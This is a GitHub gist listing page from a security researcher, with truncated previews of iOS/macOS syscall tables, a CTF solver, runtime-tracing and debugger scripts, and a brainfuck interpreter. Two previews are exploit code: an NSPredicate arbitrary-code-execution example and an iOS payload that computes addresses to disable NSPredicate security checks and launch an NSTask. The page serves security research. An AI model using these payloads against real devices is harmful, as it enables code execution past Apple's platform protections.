aemmitt-ns
aemmitt-ns
/ gist:bda9feda782016c295d694378f11158d
Last active
June 14, 2021 23:07
iOS 15.0 syscall table
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Name Class Subclass Code | |
| KTrap_DivideError DBG_MACH 0x2 0x0 | |
| KTrap_Debug DBG_MACH 0x2 0x1 | |
| KTrap_NMI DBG_MACH 0x2 0x2 | |
| KTrap_Int3 DBG_MACH 0x2 0x3 | |
| KTrap_Overflow DBG_MACH 0x2 0x4 | |
| KTrap_BoundRange DBG_MACH 0x2 0x5 | |
| KTrap_InvalidOpcode DBG_MACH 0x2 0x6 | |
| KTrap_DeviceNotAvail DBG_MACH 0x2 0x7 | |
| KTrap_DoubleFault DBG_MACH 0x2 0x8 |
aemmitt-ns
/ gist:e0e4559f11377f0a32f8dc9b61f8d219
Created
June 13, 2021 23:41
MacOS 11.4 M1 syscalls
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Name Class Subclass Code | |
| APP_AudioOverload 0x21 0x4 0x0 | |
| BOOT_BEGIN 0x21 0x2 0x0 | |
| BOOT_BEGIN_obs 0x1f 0xf2 0x0 | |
| BOOTER_timestamps 0x5 0x35 0x0 | |
| COALITION_NEW DBG_MACH 0xa7 0x0 | |
| CP_OFFSET_IO DBG_FSYSTEM 0xcf 0x0 | |
| DECMPFS_decmp_file DBG_FSYSTEM 0x12 0x0 | |
| DecrTrap DBG_MACH 0x9 0x0 | |
| DNC_PURGE1 0x11 0x0 0x0 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import z3 | |
| s = z3.Solver() | |
| s.push() | |
| poly = z3.BitVecVal(0xC96C5795D7870F42, 64) | |
| goal = z3.BitVecVal(0x751092902dfa050e, 64) | |
| ZERO = z3.BitVecVal(0, 64) | |
| ONE = z3.BitVecVal(1, 64) |
aemmitt-ns
/ predicament.m
Created
April 9, 2022 03:20
Non-deprecated NSPredicate arbitrary code exec example
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #import <Foundation/Foundation.h> | |
| /* | |
| [~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m | |
| [~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue" | |
| Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4) | |
| Value: 105553129238592 | |
| Danger: 105553129237664 (offset 928) | |
| [~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| use radius2::{Radius, State, Value, vc}; | |
| // output: | |
| // FLAG: mirror_mirror_on_the_wall_whos_the_ugliest_handler_of_them_all?! | |
| // target/release/ollvm 0.92s user 0.04s system 99% cpu 0.964 total | |
| const HASHES:[u64; 8] = [ | |
| 0x875cd4f2e18f8fc4, 0xbb093e17e5d3fa42, 0xada5dd034aae16b4, 0x97322728fea51225, | |
| 0x4124799d72188d0d, 0x2b3e3fbbb4d44981, 0xdfcac668321e4daa, 0xeac2137a35c8923a | |
| ]; |
aemmitt-ns
/ nspredpayload.m
Last active
December 30, 2023 06:26
NSPredicate payload for iOS that disables security checks and launches an NSTask
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging | |
| // use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way | |
| "$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue," | |
| "$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags | |
| "$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce | |
| "$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes | |
| "$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors | |
| "$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class | |
| "$NSPipe := $NSTask - 0x41a0," // address of NSPipe class |
aemmitt-ns
/ unplugged_apps.json
Created
July 28, 2022 22:36
list of apps on the unplugged "app store" returned from /api/store/app?size=10000
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [ | |
| { | |
| "applicationId": "com.unplugged.antivirus", | |
| "applicationName": "UP Antivirus", | |
| "applicationType": "TOOLS", | |
| "description": "Keep your device clean from malware and viruses in realtime", | |
| "versionName": "2.22.9", | |
| "versionCode": 84, | |
| "privacyRating": 5, | |
| "iconUrl": "https://up-apps-demo.s3.eu-west-1.amazonaws.com/antivirus/icon/logo.png", |
aemmitt-ns
/ quinefuck.m
Last active
October 14, 2023 19:36
a brainfuck interpreter made with an NSExpression that evaluates on itself. idk.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // yields brainfuck when quined | |
| char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]" | |
| ">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."; // -> Hello World! | |
| #import <Foundation/Foundation.h> | |
| int main(int argc, char *argv[]) { | |
| NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h]; | |
| NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier | |
| for (int i = 0; i < program.length; i++) { | |
| NSString *c = [program substringWithRange: NSMakeRange(i, 1)]; | |
| if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| "$c=?e ------------------------------------ registers -----------------------------------;?e;dr=;?e;?e ------------------------------------ disassem ------------------------------------;?e;pdi 8;?e;?e ------------------------------------ stack ---------------------------------------;?e;pxr 128@SP;?e;?e ----------------------------------------------------------------------------------;" | |
| "$ds=ds;$c" | |
| "$dc=dc;$c" |
aemmitt-ns
/ funtime.js
Last active
December 30, 2023 06:26
funtime: detailed objective-c runtime tracing. ex `python funtime.py -n Messages '-[NSRegularExpression *]'`
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const typeMap = { | |
| "c": "char", | |
| "i": "int", | |
| "s": "short", | |
| "l": "long", | |
| "q": "long long", | |
| "C": "unsigned char", | |
| "I": "unsigned int", | |
| "S": "unsigned short", |
OlderNewer